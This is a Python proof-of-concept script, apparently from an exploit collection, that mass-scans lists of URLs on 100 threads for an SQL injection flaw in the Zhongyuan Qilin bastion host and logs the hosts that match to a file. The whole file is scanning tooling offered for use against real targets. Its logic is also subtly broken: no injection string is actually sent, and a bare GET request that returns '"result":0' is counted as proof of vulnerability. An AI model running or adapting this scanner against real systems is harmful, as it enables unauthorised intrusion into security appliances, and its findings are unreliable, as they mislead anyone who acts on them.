#中远麒麟堡垒机存在SQL注入漏洞
#导包外置
import requests,argparse,sys,re
from multiprocessing.dummy import Pool
# 关闭告警
requests.packages.urllib3.disable_warnings()

def banner():
    test = """███████ ██    ██         ███████  ██████  ██      
   ███   ██  ██          ██      ██    ██ ██      
  ███     ████           ███████ ██    ██ ██      
 ███       ██                 ██ ██ ▄▄ ██ ██      
███████    ██    ███████ ███████  ██████  ███████ 
                                     ▀▀           
                                          author:CHKer
                                          version:1.0.0        
"""
    print(test)

def main():
    banner()
    parser = argparse.ArgumentParser(description="中远麒麟堡垒机存在SQL注入漏洞")
    parser.add_argument('-u', '--url', dest='url', type=str, help=' input your url')
    parser.add_argument('-f', '--file', dest='file', type=str, help='input your file path')
    args = parser.parse_args()
    if args.url and not args.file:
        poc(args.url)
    elif not args.url and args.file:
        url_list = []
        with open(args.file, 'r', encoding='utf-8') as fp:
            for i in fp.readlines():
                url_list.append(i.strip().replace('\n', ''))
        mp = Pool(100)
        mp.map(poc, url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usag:\n\t python3 {sys.argv[0]} -h")

def poc(target):
    payload = '/admin.php?controller=admin_commonuser'
    headers = {
            'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36',
            'Connection':'close',
            'Content-Length':'78',
            'Accept':'*/*',
            'Content-Type':'application/x-www-form-urlencoded',
            'Accept-Encoding':'gzip'       
    }
    proxies = {
        'http':'http://127.0.0.1:8080',
        'https':'http://127.0.0.1:8080'
    }
    try:
        res1 = requests.get(url=target+payload, headers=headers, timeout=10, verify=False,proxies=proxies)
        match = re.search(r'"result":0', res1.text, re.S)
        if res1.status_code == 200 and match: 
            print(f"[+]该url:{target}存在sql注入漏洞")
            with open('result3.txt','a', encoding='utf-8') as fp:
                fp.write(f"{target}"+"\n")
        else:
            print(f'[-]该url:{target}不存在sql注入漏洞')
    except:
        print(f'[-]该url:{target}该站点存在问题')

if __name__ == '__main__':
    main()
